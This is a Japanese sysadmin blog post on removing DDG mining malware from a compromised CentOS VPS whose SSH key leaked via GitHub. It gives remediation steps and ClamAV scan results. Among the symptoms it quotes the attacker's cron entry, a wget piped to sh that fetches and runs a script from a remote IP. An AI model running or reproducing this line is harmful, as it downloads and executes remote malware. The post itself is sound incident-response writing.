どうも。トクハラです。
とあるお客様から依頼を受け、ウイルス駆除を行いました。
今までの経験上、Linuxサーバ上で、ウイルスではないかと問い合わせが来る現象のほとんどはウイルスではありません。
単なるダメクエリや特定のサービス・プログラムが無限ループに入っただけです。
「ウイルスだと思うんですが・・・」と尋ねられると、
私のココロの声はダイアンじゃないですが「す〜ぐ言う〜!」です。
しかし、今回だけはビンゴでした。
ついお客さまを疑ってしまいました。すみませんでした。
環境
Conoha VPS 2GB
CentOS Linux release 7.5.1804 (Core)
(1)現象
Cpuが100%近くに張り付く。
覚えのないプロセスが起動している。
Killコマンドでプロセスを落としてもしばらくたつとまた別の名称のプロセスが起動する。
見覚えのないcronが存在する
#*/15 * * * * wget -q -O- http://149.56.106.215:8000/i.sh | sh
(2)原因となるプログラム
/tmp/ddgs.3014
/tmp/qW3xT.3
いくつか亜種が存在するようだ(数字の部分が異なっている)。
(3)対応
■/tmpにある以下のファイルを削除する
/tmp/ddgs.3014
/tmp/qW3xT.3
■crontabを削除する
■既に存在するauthorized_keysを削除する
■鍵を再作成する
#ssh-keygen -t rsa
■作成し直した公開鍵をauthorized_keysに再度追加する
#cat /{ssh_key_path}/id_rsa.pub >> /{authorized_keys_path}/.ssh/authorized_keys
翌日にログインすると大量のログイン失敗履歴がある。
そこでsshのポートも変更することにした。
■sshdのポート変更
※conohaはデフォルトポート以外は閉じている。
ポートを変更した直後にssh接続がタイムアウトになったので少し慌てしまった。
コンソールからポートを開放した。
■根本原因
/tmp配下にroot権限でモノが置かれていた。
鍵が流出したとしか思えないため、お客様に尋ねました。
すると、間違えてgithubに鍵をアップロードしてしまったことがあったらしい。
すぐに削除したとのことだけどその瞬間に誰かに取られたのでしょうね・・・。
みんなも気をつけましょう。
以上
※
補足1
cronに記載されていたIPからドメインを引いてみた。
* 調査開始 *
149.56.106.215 ==> ns528389.ip-149-56-106.net
* 調査終了 *
補足2
clamavを入れて調査した
(参考)https://www.server-memo.net/server-setting/clamav/epel-clamav-install.html
2018/10/24時点ではclamavはddgsは発見できなかった。
clamavのインストールおよびスキャンで以下のファイルを発見・削除した。
clamdscan /usr –remove –log=/var/log/clamd_log.log
cat /var/log/clamd_log.log
————————————–
/usr/bin/pbgatnrmjy: Unix.Trojan.DDoS_XOR-1 FOUND
/usr/bin/pbgatnrmjy: Removed.
/usr/bin/ywcmvrvxtu: Unix.Trojan.DDoS_XOR-1 FOUND
/usr/bin/ywcmvrvxtu: Removed.
/usr/bin/mmgcvdwixu: Unix.Trojan.DDoS_XOR-1 FOUND
/usr/bin/mmgcvdwixu: Removed.
/usr/bin/mdrrguuvbg: Unix.Trojan.DDoS_XOR-1 FOUND
/usr/bin/mdrrguuvbg: Removed.
/usr/bin/jxqlfkvcst: Unix.Trojan.DDoS_XOR-1 FOUND
/usr/bin/jxqlfkvcst: Removed.
/usr/bin/ousyhbgqoa: Unix.Trojan.DDoS_XOR-1 FOUND
/usr/bin/ousyhbgqoa: Removed.
/usr/bin/jofhtjbdml: Unix.Trojan.DDoS_XOR-1 FOUND
/usr/bin/jofhtjbdml: Removed.
/usr/bin/swsqdjvbhy: Unix.Trojan.DDoS_XOR-1 FOUND
/usr/bin/swsqdjvbhy: Removed.
/usr/bin/dmdjpbjgaf: Unix.Trojan.DDoS_XOR-1 FOUND
/usr/bin/dmdjpbjgaf: Removed.
/usr/bin/azytzkdrfe: Unix.Trojan.DDoS_XOR-1 FOUND
/usr/bin/azytzkdrfe: Removed.
/usr/bin/mkhbejkydy: Unix.Trojan.DDoS_XOR-1 FOUND
/usr/bin/mkhbejkydy: Removed.
/usr/lib/libudev.so: Win.Trojan.Agent-6354603-0 FOUND
/usr/lib/libudev.so: Removed.
/usr/lib/libudev.so.6: Win.Trojan.Agent-6354603-0 FOUND
/usr/lib/libudev.so.6: Removed.
———– SCAN SUMMARY ———–
Infected files: 13
Time: 39.177 sec (0 m 39 s)
自分用メモ
centos6
シンボリックリンク作らないと怒られる
sudo ln -s /etc/clamd.d/scan.conf /etc/clamd.conf